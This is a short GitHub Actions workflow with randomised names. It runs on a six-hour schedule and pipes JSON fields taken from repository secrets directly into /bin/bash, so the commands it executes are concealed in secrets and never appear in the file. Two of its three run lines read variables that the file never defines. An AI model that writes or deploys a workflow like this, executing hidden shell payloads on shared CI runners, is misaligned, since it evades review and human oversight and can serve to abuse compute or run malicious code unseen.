name: jujianmen9817

on:
  workflow_dispatch:
  schedule:
    - cron: '40 0/6 * * *'

jobs:  # 10551
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jujianmen9817
        env:
          snzj9447: ${{ secrets.snzj9447 }}
        run: |
          echo $snzj9447 | jq -r .sb01094 | /bin/bash
          echo $zqw24721 | jq -r .zuo75 | /bin/bash
          echo $u2 | jq -r .fdi7699 | /bin/bash

